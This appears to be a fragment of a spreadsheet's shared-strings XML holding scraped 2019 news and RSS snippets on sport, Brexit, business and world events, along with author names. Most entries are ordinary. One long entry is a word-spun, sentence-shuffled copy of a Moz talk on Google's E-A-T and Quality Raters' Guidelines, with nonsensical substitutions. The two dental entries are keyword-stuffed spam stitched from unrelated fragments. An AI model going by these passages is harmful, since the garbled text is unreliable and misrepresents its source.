number if you have concerns regarding missing inserts in your box set.</t>
  </si>
  <si>
    <t>Kitchener Rangers goaltender Luke Richardson is leaving the team to head to university.</t>
  </si>
  <si>
    <t>The people's troubador effortlessly owns the occasion, headlining the AFL grand final's pre-match entertainment with poetry and passion.</t>
  </si>
  <si>
    <t>FOOTBALL: Northern NSW Football have launched a modified football program to encourage women to get fit through a more social and accessible … The post Girls getting their kicks out of new female focused program appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>BUZZ ALDRIN was left incensed after learning his colleague – Neil Armstrong – would be the first man to step foot on the Moon, leading him to confront the Apollo 11 legend and his bosses, an author has claimed. The post Moon landing shock: How fuming Buzz Aldrin confronted NASA over Apollo 11 – ‘Not happy!’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>source: http://feedproxy.google.com/~r/seomoz/~3/G4hihgEqQZo/eat-and-the-quality-raters-guidelines The three elements of E-A-T 1. Experience EAT called Experience, Authoritativeness, and Trustworthiness -- is a big deal in regards to the calculations of Google. But what does this acronym demand, and why does this matter to your daily work? In this bite-sized variant of her complete MozCon 2019 demonstration , Marie Haynes describes exactly what E-A-T signifies and how it might have a make-or-break effect on your site. We shouldn't be no indexing these posts. Don't be worried about the simple fact they are irrelevant or kind of thin or perhaps even duplicate content. Google would like to find this, so we want this to be in their own algorithms. Prior to this, websites which were hit, they tended to have all kinds of technical issues, and we could say,"Yes, there's a really powerful reason why this site isn't ranking well." These sites were all ones which were technically, for the large part, audio. However, what we noticed is that, in each case, the articles that were now stealing the rankings they had to own were ones which were written by people with real life experience. Among the things that we began discovering, at February of 2017we had quite a few websites that came with visitors drops. That is mostly what we do. We deal. What we had been discovering is a weird thing happened. Nevertheless, the significant thing here is that if some of those 3 things, the E, the A, or even the T are lacking, it can affect your ability to rank well. So this was helpful. I truly hope that this makes it possible to improve the quality of your websites. I'd encourage you to leave a comment or a query below. I'm going to be hanging out from the comments section and answering all of your questions. I do think it's a part of how they determine trustworthiness. So what we are looking for here is when a business has a bad reputation, when you have a standing where folks online have been saying,"Look, I got cheated by this business." Or,"I couldn't get a refund." Or,"I was treated very poorly concerning consumer services." When there's an overall sentiment concerning this online, that may influence your ability to rank well, and that's very significant. So all of these items are significant in terms of trustworthiness. The superior raters do not have the power to set a penalty on your website. They have no direct bearing on rankings. But rather, what happens is that how they feed data back to Google's engineers, along with Google's engineers can take that information and decide whether their algorithms do what they need them to perform. Ben Gomes, the Vice President of Look at Google, he had a quote recently in an interview with CNBC, and he explained that the excellent raters, the advice that is in there is fundamentally what Google needs the algorithm to perform. Add writer bios 1. Information from the Superior raters allows them to build algorithms How Google fights disinformation But expertise is very important. In the Quality Raters' Guidelines, which each of you, when you have not read it yet, you really, really should read this document. Hire specialists to fact-check your articles This is not something you wish to ignore. Is trustworthiness. People would say,"Well, how can Google ever quantify whether or not a site is reliable?" I think it possible. If there's a patent, they're not necessarily doing this now we know. We'll proceed to authoritativeness. Authoritativeness is actually very, very important, and in my own view this is definitely the most important part of EAT. Authoritativeness, there's another mention in the Quality Raters' Guidelines about a great article, and it says,"The author of the blog post was known as an expert on parenting issues." In the past every link that we could make could have the capability. Nowthe hyperlinks that Google would like to rely are ones who really are people recommending your articles, your small business, your author. So I'd a Whiteboard Friday a couple of years ago that spoke about the kinds of links that Google may want to value, and that's probably a good reference to discover how do we find these recommendations from experts. It's a bit lengthy, but it is filled with so much details that is excellent. The raters are given cases of websites, plus they're told,"This really is a high-quality site. This is a low-quality website as a result of this." One of the things that they state for one of the posts is this particular page is to be considered low quality because the knowledge of the writer is not clearly communicated. 3. Trustworthiness There were a couple of things in here that were intriguing. Subscribe to The Moz Top 10, a semimonthly mailer upgrading you about the top ten most popular pieces of SEO information, suggestions, and rad links discovered by the Moz team. Consider it that you do not have the enough time to look down but need to read! Click on the whiteboard picture above to start a high profile variant! One of those things that we have been seeing recent upgrades is a whole great deal of health care websites are falling when they're not actually in line with scientific consensus. This is a big one. If you run a site that has related to natural medication, this is probably a rough time for youpersonally, because Google has been demoting websites that discuss a lot of natural medication treatments, and the main reason for this, I think, is because a lot of these are not in accord with the overall scientific consensus. Evidently, the physician is who you would like to see. Now I don't expect us to go and employ physicians to compose all of our content, because there are very few physicians that have time to do this and the other specialists in any other YMYL profession. However, what you can do is hire these folks to fact check your articles. We've had some clients that have seen very nice results from having content writers compose the posts in a really well researched and referenced manner, then they have hired physicians to mention this article was clinically reality assessed by Dr. So-and-so. This is really, very vital. Other things also, when you've got a medical website or any type of site which could be supported with scientific references, so it's extremely important that you do that. The guide discussed the fact that that they take the information from the quality raters and that allows them to build algorithms. So we know that it's important that the things that the superior raters are analyzing are matters that we probably need to be paying attention as well. 2. Ranking systems are created to ID websites with high expertise, authoritativeness, and trustworthiness Video transcription by Speechpad.com Another example in the Quality Raters' Guidelines speaks around has been a post about the flu. What the superior raters have been told is that there is no signs that this writer has medical experience. So this tells usand you can find other instances where there's no evidence of financial experience, and legal expertise is just another one. Consider it. Credible, clear contact info on site I know a lot of people would say"Well, who is Google to determine if essential oils are helpful or not, since I feel lots of these natural treatments truly do help people?" The problem is that there are a whole lot of websites which are defrauding people. So Google might even tack on the side of caution saying,"Look, we believe this site could potentially affect the safety of consumers ." So we feel that if something is at the Quality Raters' Guidelines, either Google is already measuring this algorithmically, or they need to be measuring it, and so we should be paying close attention to everything that's in there. Feeling like you Will Need a better understanding of E-A-T and the Quality Raters' Guidelines? It is possible to become even more information from Marie's full MozCon 2019 speak in our recently released video package . Go more added future-focused Search Engine Optimization themes from our speakers: Get recommendations from experts If you were diagnosed with a health condition, would you need to be reading a post that's written by means of a content author who's done great study? It might be very well composed. Or would you rather find a post that's written by somebody who has been practicing in this area for years and has seen each kind of side effect which you could have from medications and things like that? "If any of Expertise, Authoritativeness, or Trustworthiness is lacking, use the'non' rating." Ad expertise So it is 1 thing to be a specialist. It is just another thing to be recognized online as a professional, and this must be what we are working is to get other people online recognize our clients as experts in their subject matter. That seems a lot like link building? We would like to have links from authoritative sites. However they really do have a patent that talks about how they can collect details about a brand, about an individual, about a web site from looking at a corpus of testimonials, blog articles, and other things that are online. What this patent talks about is looking at the sentiment of these blog posts. Now some people will argue that sentiment isn't a portion of Google's algorithms. So it is important to know a lot of individuals get hung up on experience, and that EAT includes three components. I visit a good deal of individuals come to me and say,"But I'm a physician, and I don't rank well." Well, there are parts to EAT than expertise, and so we are going to talk about that. Whether or not we want to argue whether EAT is a factor, I think that is semantics. What the term"ranking variable" means, what we actually need to be aware of is that EAT is actually important in Google's algorithms. We think that if you're attempting to rank for almost any term that really matters to individuals,"your money or your life" actually means if it's a webpage that is helping people make a determination in their own lives or helping people part with cash, then you will need to pay attention to EAT, because Google doesn't want to rank sites that are for important queries if they are lacking EAT. Put money into a sack of popcorn and get your team on board to find out! Indexable, easy-to-find information on refund policies You may have trouble ranking well. Therefore, in the event you have articles on natural medication, on any kind of thing that's out of the normally accepted scientific consensus, then 1 thing you can do is try to demonstrate both sides of the story, try to discuss how actually traditional doctors would take care of this ailment. That may be tricky. How do we do so? It is all about obtaining recommendations from experts. The Quality Raters' Guidelines state in a number of areas the raters are taught to ascertain what exactly do additional experts say about this website, relating to this author, about this brand. It is very important that we're able to get recommendations. I want to challenge you right now to have a look at the last few links you have gotten for your site and look at them and say"Are these really recommendations from different individuals in the industry that I'm working in? Or are those that we made?" You truly should have credible and very clear contact information in your site. That is outlined at the Quality Raters' Guidelines. You should have information in your own refund policy, assuming that you market products, and it ought to be simple for people to locate. All should be visible in the index of Google. "They basically show us exactly what the algorithm must do." So the first clue we could gather from that is that for each our authors we ought to get an author bio. If you are a nationally recognized brand you might not need author bios. But for the rest of uswe really should be putting an author bio that says here is who composed this article, and here is why they're capable to do so. Reputation through reviews, blog articles, &amp; other internet content Catch the sessions now! There was a guide that was produced by Google before , in February of 2019, and it was a whole manual on how they fight disinformation, how they struggle fake information, how they produce it so high-quality results are emerging in the search results. I want to give you this quote, again in the Quality Raters' Guidelines, and this is important. The raters are taught that if any of authoritativeness experience, or trustworthiness is currently missing , then they are to rate a site as reduced quality. That's not going to punish that site. But it's likely to tell the Google engineers,"Wait a second. We have these low carb websites that are ranking for all these terms.How are we update the algorithm so that that doesn't occur?" I've got more info on these topics at mariehaynes.com/eat and /trust if you're considering these trust issues. I want to thank you. I wish you the best of luck with your rankings, and do leave a question for me under. 2. Authoritativeness Moz lovers, hey. My name is Marie Haynes, in Marie Haynes Consulting, and I will talk to you about EAT and the Quality Raters' Guidelines. By now, you've probably heard of EAT. It is a Small buzzword at SEO. I will share with you why EAT is a significant portion of Google's algorithms, how we are able to take advantage of this news, and also why it's really, very important to most of us. Is the advertisement experience. I think that this is something that's not in the algorithms just yet. I think that it's going to come. It is. However, the Quality Raters' Guidelines talk a lot about if you have ads that are distracting, that are disruptive, that block the viewers out of viewing articles, then that can be a indication of non trustworthiness. How do we do link construction in a way that promotes our authoritativeness in Google's view? The guide for this information really tells us PageRank and EAT are tightly linked. So this really is very, very important. Personally, I believe -- I can not prove this just yet -- but I think that Google doesn't want to pass PageRank via sites that do not have EAT, at least to YMYL queries. This could explain why Google feels very comfortable that they can dismiss spam links from damaging search engine optimization attacks, because those links would come in websites that don't possess EAT. The matter that has been the most important to me personally or the most interesting, at least, is the line that stated our rank systems are intended to recognize sites with a tall indicia of EAT, of expertise, authoritativeness, and trustworthiness. Let's discuss the Quality Raters' Guidelines. These guidelines are a record that Google has provided to this army of quality raters. There are grade raters, and what they do is they use this particular document, the Quality Raters' Guidelines, to ascertain whether sites are high quality or not. The post E-A-T and the Quality Raters’ Guidelines – Whiteboard Friday appeared first on TrafficSplash.</t>
  </si>
  <si>
    <t>Rachael D’Amore</t>
  </si>
  <si>
    <t>The islands are known for their marinas and all-inclusive resorts. Little has been left unscathed by the storm.</t>
  </si>
  <si>
    <t>The Prime Minister took his global fight against social media giants to the United Nations yesterday as he warned terrorists and violent extremists were “weaponising” the internet.</t>
  </si>
  <si>
    <t>The Producer Dojo Cypher 015: Space Station Beats EP is now available. Stream/Download: https://fanlink.to/cypher015 Learn more about MESSEA here: https://soundcloud.com/messeamusic The monthly Producer Dojo Cyphers are resulting in some epic tunes being made. This time the Cypher is curated by Moonsplatta, an artist who has been a part of the Dojo since its founding and […] The post MESSEA – Celestial Void appeared first on Dubster.</t>
  </si>
  <si>
    <t>Rick Zamperin</t>
  </si>
  <si>
    <t>Cleveland Browns star receiver Odell Beckham Jr. wore a US$190,000 watch during Sunday's game against Tennessee, which the National Football League says is a no-no.</t>
  </si>
  <si>
    <t>Donald Cerrone faces Justin Gaethje in an important lightweight matchup in the main event of Saturday’s UFC Fight Night 158 from Vancouver. Source: Sports Business News</t>
  </si>
  <si>
    <t>Talks between Jeremy Corbyn and leaders of Westminster’s smaller parties on how to block a no-deal Brexit have been hit by a rift between Labour and the Liberal Democrats. Read more? Click here</t>
  </si>
  <si>
    <t>Saudi Arabia oil facilities ablaze after drone strikes [tap to expand]https://t.co/LtEULNKlWy pic.twitter.com/m31yxezBNk — BBC News (World) (@BBCWorld) September 14, 2019 Via Fox News: The world’s largest oil processing facility and a nearby oil field in Saudi Arabia were set ablaze early Saturday morning after reported drone attacks by Iranian-backed Yemeni rebels. The Interior Ministry was […]</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/08/kite-hill-cofounded-by-the-creator-of-impossible-foods-looks-to-be-gaining-traction-too/ Kite Hill, cofounded by the creator of Impossible Foods, looks to be gaining traction, too Before he founded the plant-based burger company Impossible Foods, Patrick Brown, who spent 25 years as a biochemistry professor at Stanford, also co-founded a Hayward, Ca.-based food company called Kite Hill that has developed numerous nut milk products that it says are healthier and more sustainable than their dairy counterparts. Investors seem to agree. According to a new SEC filing, the now nine-year-old company is sealing up $15 million more in funding (and has at least $10 million in fresh capital locked down). The company most recently closed a round if funding last fall, including from backers General Mills, CAVU Venture Partners, and New Crop Capital, and this newest infusion should bring the company’s total funding to around $80 million, according to Crunchbase. It’s easy to understand their enthusiasm for the space more broadly. The vegan cheese market has seen double-digit growth over the past few years, according to Nielsen data, which recently found that sales of plant-based cheese grew 41% through August of of 2018, compared with the flat sales of traditional dairy cheese. Sales of almond, soy, oat and other plant-based milks are soaring, too. According to Nielsen data, sales of plant-based milk beverages rose 9% in the year ending in June 2018, up from 3% the previous year. Meanwhile, traditional cow’s milk sales fell 6% during the same period. Kite Hill makes almond milk yogurts, greek yogurts, cream cheese, ricotta, pastas, dips, and kids tubes that are sold in Safeway, Whole Foods, and Amazon, among other retail outlets. Along with Brown, it was founded by Monte Casino, a former instructor at Le Cordon Bleu in Boston and Tal Ronnen, a chef and the founder of the vegan Los Angeles restaurant Crossroads Kitchen. It’s a crowded space to be operating in. Califia Farms, for example, which makes non-dairy milks and yogurts, among other things, was founded the same year in Bakersfield, Ca., and has raised $115 million so far, including from Stripes Group. Five-year-old Ripple Foods, in Emeryville, Ca., has similarly outpaced Kite Hill on the fundraising front, raising $120 million so far for its non-dairy milk products. Kite Hill is also competing with big companies that are eager to stay relevant as customer preferences change. Among them, Danone revealed plans to triple the size of its plant-based business — including its non-dairy beverage and yogurt products — by 2025. Indeed, a strategy for most brands like Kite Hill seems to be to accept funding from the growing number of giant food companies that have established venture arms and hope they’ll help grow their brand, rather than try extinguishing it. Among the behemoths currently funding their smaller rivals is General Mills (its venture arm is 301 INC), Campbell Soup (Acre Venture Partners), Tyson Foods (Tyson Ventures), and Kelloggs (1894 Capital). Source: https://techcrunch.com/2019/09/08/kite-hill-cofounded-by-the-creator-of-impossible-foods-looks-to-be-gaining-traction-too/ The post Kite Hill, cofounded by the creator of Impossible Foods, looks to be gaining traction, too appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Tom Cairns</t>
  </si>
  <si>
    <t>Nico Hülkenberg gears up for an enduring Singapore Grand Prix that is staged this weekend for the fifteenth race of the 2019 FIA Formula 1 World Championship. The German goes into the round on the back of two solid points-finishes in Spa and Monza, underlining why the Renault F1 Team driver earns his right to keep his place on the grid. Racing under the lights is what Hülkenberg describes as “unique”, as he hopes to put on as good of a show as did in the previous two rounds. “Singapore is the only real night race on the calendar, so that makes it really unique,” Hülkenberg said. “It does take a bit of extra time to get used to racing under artificial lights but we’re quite adept to it now. We stay on European time there, so that means waking up at lunchtime and then we have the rest of the day and night ahead. We don’t see too much day light!” Credit: Octane Photographic Ltd. The thirty-two year old’s best result in Singapore has been ninth in 2013 and 2014 but has failed to finish in three of the last four events on this street track. Hülkenberg expects to see a lot of tired drivers at the end of this weekend’s race. “It’s probably the most physical race of the season. A lap is very busy at the wheel, extremely physical and tiring,” Hülkenberg added. “It’s a long circuit with corners coming thick and fast without many straights to have a rest. The humidity makes it very tricky and that, combined with all the gear shifts and changes of direction, makes it exhausting come the end of the race.” The aim for the Renault pilot is to close the gap on rivals McLaren F1 Team in the battle for fourth in the Constructors’ Championship. He believes it is “certainly possible” for that to happen in Singapore. “The team left Italy on a real high,” the German said positively. “The whole weekend was a super effort from everyone, starting with a solid qualifying result and then a strong race to move up a position. We’ve made a big swing in the Constructors’ Championship and the race for fourth is on. “We have to develop this now and aim to pick up these kinds of results more regularly. It’s certainly possible and we won’t be letting up.”</t>
  </si>
  <si>
    <t>Jocelyn Garcia</t>
  </si>
  <si>
    <t>Police have released a computer-generated image of the man they say attacked a teenager at Varsity Lakes.</t>
  </si>
  <si>
    <t>Jon Healy And Dan Colasimone</t>
  </si>
  <si>
    <t>Steve Smith once again looms as the key for Australia after a rain-shortened day one at Old Trafford. Can he kick on and help set up a challenging total for England to match? Follow our fourth Ashes Test live blog.</t>
  </si>
  <si>
    <t>‘Red top’ warning will alert shareholders to businesses that fail to curb bosses’ benefits An influential investor group has told companies they must publish credible action plans that align executive pension pay with their workforce by 2022, or risk further shareholder revolts.The move could result in companies slashing bumper pension payouts for several executives, who pocket hundreds of thousands of pounds in cash retirement benefits every year. Continue reading… Read More</t>
  </si>
  <si>
    <t>Infant swimming school business Water Babies is taking the plunge into a new area of operations by opening its own network of pool centres in the UK and overseas. The expansion will reduce dependency on hiring pool space and builds on the success of the franchising firm that founder Paul Thompson started in 2002 from home with just £5,000. Daily Express :: City and Business Feed</t>
  </si>
  <si>
    <t>Nufarm Americas announced its recommitment of $150,000 to Project EverGreen’s GreenCare for Troops program. The nationwide program assists thousands of military families by providing basic lawn care and yard maintenance while a family member is deployed. The investment will help expand the impact of the initiative and enable more lawn and landscape professionals with the opportunity to give back to their community in a meaningful way. Now in its 13th year, the GreenCare for Troops initiative counts more than 6,000 industry professionals among those who have registered to help more than 11,000 military families. “Nufarm is proud to be a sponsor of GreenCare for Troops and the good that it encompasses,” Nufarm Americas VP turf and ornamental Sean Casey said. “Military families face many challenges when their loved ones are deployed. GreenCare for Troops works nationwide to connect them with complimentary lawn care services. It’s a great way for lawn and landscape professionals to give back and help military families relieve stress by coming home to a worry-free green yard. We encourage everyone to get involved by donating, volunteering or spreading the word.” “Nufarm’s ongoing overall support to this incredibly worthwhile program is making a significant difference in the lives of military families and professional lawn and landscape contractor volunteers across the country,” Project EverGreen executive director Cindy Code said. “This ardent support has helped this nationwide to build upon its success and, ultimately, bring safe and healthy yards and landscapes to families in need of relief and peace in a green setting.” 16.00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font-size:12.0pt; mso-bidi-font-size:11.0pt; font-family:”Helvetica”,sans-serif; mso-bidi-font-family:”Times New Roman”; mso-bidi-theme-font:minor-bidi;} Source link</t>
  </si>
  <si>
    <t>Mark Douglas</t>
  </si>
  <si>
    <t>Newcastle United takeover talk has been dismissed by many supporters but there is a very important message the club’s fans should heed This post written by Mark Douglas originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Football’s best Rapinoe highlights issues … and inequalities that she said still exist in football after being crowned the FIFA women’s player of the year. The post Football’s best Rapinoe highlights issues appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Airdrie, AB. affordable dentistry services has seen Airdrie Bayside Dental &amp; Orthodontics attract lots of market attention from patients looking for quality backed services that will not strain. Reviews on Dentist Reviews in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Sonata Dental, Sierra Springs Dental, Bayside Dental &amp; Orthodontics, Sierra Dental Airdrie, Thayne Blunston, DDS, Rahul Mathur, DDS – Airdrie 8th Stree. Cosmetic Dentist In Airdrie The Best Cosmetic Dentists in Airdrie Handpicked Top 3 Cosmetic Dentists in Airdrie, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and. Cosmetic Dentist in Airdrie, Alberta 5 5 Kid Friendly Dental Clinic Near Airdrie Searching for a family dentist near you in T4B 3G4? Sonata Dental is an exciting new addition to the Airdrie community!. Schedule an appointment today!. Giving birth in rural Oregon – Pregnant with her first child, Denise Piza bypassed her Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Airdrie. We're the original doctor ratings site with over 2 million reviews. Very impressed with my experience, I have been putting off going the dentist for a lon. Best Dental Clinic In Airdrie Sierra Dental Airdrie is a full-service clinic, providing your family with complete dental care. Visit our Airdrie Dentist today or call (403) 768-1000. Best Dentists in Airdrie, AB – Airdrie Choice Dental, Blunston Dental Group, Yankee Valley Dental, North Main The Best Dentists in Airdrie Handpicked Top 3 Dentists in Airdrie, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the. Best Dentists in Airdrie, AB – Airdrie Choice Dental, Blunston Dental Group, Yankee Valley Dental, North Main Family Dental, Bayside Dental &amp; Orthodontics, Sonata Dental, Kingsview Dental, Nose Creek Dental Centre, Rahul Mathur, DDS – Airdri. Berezan calls CultivatR. to best practices such as chemical-free produce, soil health, and humanely raised or grass-fed. Builders are swapping cement for weed to reduce pollution – (Bloomberg) — The hemp fields sprouting in a part of Canada best known for its giant oil. can supply,” said Radford from. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists 1. Railway Avenue Dental Dentist. .</t>
  </si>
  <si>
    <t>China's plans for a digital currency could serve as a "foundation" for the yuan's internationalization, allowing it to be distributed across the globe, says Circle's Jeremy Allaire.</t>
  </si>
  <si>
    <t>Saudi Arabia has shut down half of its oil production after drones attacked the world's largest oil processing facility in the kingdom, The Wall Street Journal reported.</t>
  </si>
  <si>
    <t>Scuderia Ferrari come to Singapore this weekend on the back of two consecutive race victories at Spa-Francorchamps and the Autodromo Nazionale Monza, but Team Principal Mattia Binotto is expecting a much tougher weekend at the Marina Bay Street Circuit than in Belgium or Italy. Charles Leclerc won in both Belgium and Italy – his first two victories of his Formula 1 career, but the Singapore Grand Prix will present a much different challenge to the Monegasque driver and his German team-mate Sebastian Vettel, with the downforce levels at Marina Bay at the complete opposite end of the scale compared to the previous two events. High downforce is a necessity this weekend, with the Singapore race not only one of the slowest on the calendar, but also one of the longest, made all the trickier by the heat and humidity despite the event taking place at night under floodlights. Binotto says Ferrari are aware of the challenges that are likely to come this weekend, but they are bringing some updated aerodynamic components to Singapore in a bid to minimise their pace discrepancy against their main on-track rivals, Mercedes AMG Motorsport and Aston Martin Red Bull Racing. “Coming from back to back victories is a good feeling for the team and for our tifosi, but in reality these victories are already behind us and we are well aware that Singapore will present new challenges and a layout in which our car is not as strong as at other circuits,” said Binotto. “We are bringing a few new parts there as part of our effort to close the gap to the competition, at a track that features predominantly slow speed corners. This race also sees the return of the Hypersoft tyre compound, which has not been used since the Canadian GP. “All of this, together with the traditionally eventful close racing in between the barriers, on the city streets – conditions that both Sebastian and Charles love very much – will certainly make for a tough but exciting race weekend.”</t>
  </si>
  <si>
    <t>AndyRoo</t>
  </si>
  <si>
    <t>Just posting as this is a great deal for anyone looking for a flat bar road bike. They have them in 2 sizes and come with shimano sora groupset. Bikes with sora groupset usually go for the 500+ range so seems like a pretty good deal. Also 7% shopback at the moment so get the bike for $184. Postage is a bit of a killer for me at $100 for the 20" and $60 for the 15" (might vary for you) but still a bargain even with the postage. 15" version here: https://www.rebelsport.com.au/p/flight-metro-comp-flat-bar-1...</t>
  </si>
  <si>
    <t>Equalibras</t>
  </si>
  <si>
    <t>This content originally appeared on DiabetesSisters. Republished with permission.By Katrina Heath Oh no, I need to go to the bathroom again! Does this sound familiar? Have you ever wondered why some women have problems with bladder and bowel function, and others do not? Let’s discuss what causes some women to have dysfunction in these areas? Pelvic […] The post What Is Pelvic Wellness and What Can You Do About It? appeared first on Equalibras.</t>
  </si>
  <si>
    <t>Reid Wilkins</t>
  </si>
  <si>
    <t>"You go out there and take pride in it. You build momentum for the team."</t>
  </si>
  <si>
    <t>Mini factory in Cowley to shut on 31 October as part of car firm’s preparations for no dealBMW will close its Mini factory in Oxford for two days on 31 October to guard against potential disruption as the carmaker prepares for Brexit.The German company’s chief financial officer, Nicolas Peter, said the Cowley plant would shut on 31 October – Brexit deadline day – and 1 November to safeguard the company’s logistics. Peter said BMW had no plans to shift manufacturing to other sites yet but that Cowley was likely to produce fewer cars under a no-deal Brexit. Continue reading… Read More</t>
  </si>
  <si>
    <t>Sean Boynton</t>
  </si>
  <si>
    <t>The petition filed in B.C. Supreme Court Thursday argues the tax is unconstitutional, and that collecting revenue from the tax is beyond the powers of the provincial government.</t>
  </si>
  <si>
    <t>O2 HAS just announced the launch of its fully unlimited smartphone plans as the network now rivals EE, Three and Vodafone. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Jane Gerster</t>
  </si>
  <si>
    <t>'In a market-driven economy you don’t see significant environmental reform until we put a price tag on pollution.'</t>
  </si>
  <si>
    <t>Gang members enrol in universities and masquerade as students “to have an alibi”. Read more? Click here</t>
  </si>
  <si>
    <t>Firm joins BMW and Toyota in halting production to mitigate disruption in event of no dealJaguar Land Rover will halt production at British factories for a week in November, joining BMW and Toyota in staging a shutdown to mitigate potential disruption from a no-deal Brexit.Speaking a day after Michael Gove said the automotive industry was ready for no deal, the JLR chief executive, Ralf Speth, said the company had no choice but to stop production lines at four facilities. Continue reading… Read More</t>
  </si>
  <si>
    <t>Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the denta. Preferred Dental Clinic Near Kitchener Ontario Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. . Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We. Best Dentist In Kitchener Number 1 Dental Clinic In Kitchener Ontario The health centre has nearly doubled its number of medical exam. registered practical nurse and clinic assistants serve. Best Dentist In Kitchener Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. But she rounded on Singh over a promise for universal dental coverage in addition to drug coverage. "What I support is the. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Cosmetic Dentist Near Kitchener Ontario As you consider a dentist in Kitchener, ON, take some time to browse our website and familiarize yourself with our practice. Welcome to our General and Family Dentistry, located in Kitchener, Ontario. We offer a Emergency Dentistry, Pediatri. List of the best Cosmetic Dentistry in Kitchener, ON. Get customer reviews , prices, contact details , opening hours from Kitchener, ON based businesses with Cosmetic Dentistry keyword. Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. . Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental Office and Infinite Dental office. Dentist in Kitchener,Waterloo and. Most Popular Dentist In Kitchener Ontario Most Popular Open now Online Messaging Categories Whitening Orthodontists Emergency Prosthodontists Oral Surgery Endodontists Pediatric Periodontists Rate these results. Best Dental Clinic Near Kitchener Ontario Highest Rated Dental Clinic Near Kitchener Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on. Highest Rated Dentist In Kitchener Edward Paul Sheringham MBE (born 2 April 1966) is an English football. Kid Friendly Dental Clinic Near Kitchener Kid Friendly Dentist. We provide a fun, kid-friendly environment with a caring and highly trained staff to ensure that your child's visit is a pleasant one. Top Dental Clinic In Kitchener Ontario Nancy Le Denture Clinic serving the Kitchener Waterloo &amp; Cambridge area for over 20 years. We provide services for complete dentures, partial dentures, repairs, relines and other dental needs. Nancy Le Denture Clinic serving the Kitchener Wa. The latest in dental technology and techniques are available at this modern dental clinic located at Waterloo in Ontario. The highly qualified, experienced and professional team endeavour to create a comfortable and caring environment where. Kid Friendly Dentist In Kitchener Prince George, BC — (SBWIRE) — 09/20/2019 — Rapha Dental Centre is a family dental office that has been committed to providing professional and friendly services to families in Prince George that. Bringing a baby along for a campaign tour is unusual for a political staffer. But the Scheers have five kids of their own —. Entrepreneurship is second nature for Brodie, who, at 28, is CEO and co-founder of Kitchener, Ont.-based Bridgit. Brodie. The Best Children Dentists in Kitchener Handpicked Top 3 Children Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. The family’s four children were playing outside. she would have been an easy target. “She is very friendly,” says mother. Emergency Dentistry services in Kitchener, Ontario. We offer emergency walk-ins and same day appointments. Kid-friendly family dentist Direct electronic billing to your insurance Open evenings and weekends Zero interest payment plans. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental care for children. Topic, who’s also without children of her own and has three dogs. in the Shape DTK 2020 report that was compiled in. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. User Guide On Dentist – You’d be surprised to find how welcoming most family friendly dentists really are. Through the appointment you’ll have the ability to experience what dentists and the staff are like and the. Root Canal Therapy in Kitchener can help you fix an infected tooth and inflamed tooth pulp.; ?&gt; CALL NOW 1-519-893-2790. Kid-friendly family dentist Open evenings and weekends Direct electronic billing to your insurance Zero interest. Number 1 Dentist Near Kitchener A 41-year-old man has life-threatening injuries after he was struck Saturday morning by an SUV in a Kitchener parking lot. It. We care about your satisfaction and this is our number one priority! Our practice provides a full range of dental treatments and services including, but not limited to: Regular Dental Check-ups, Trudeau says he’ll apologize to Singh directly – I’m surprised and I was more surprised when I saw the number of times. pharmacare and dental care on the campaign trail. Number 1 Dental Clinic Near Kitchener Ontario Friendliest Dentist In Kitchener Ontario Highest Rated Dental Clinic Near Kitchener Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Cosmetic Dental Clinic Near Kitchener Need dentist in Waterloo? We provide dental 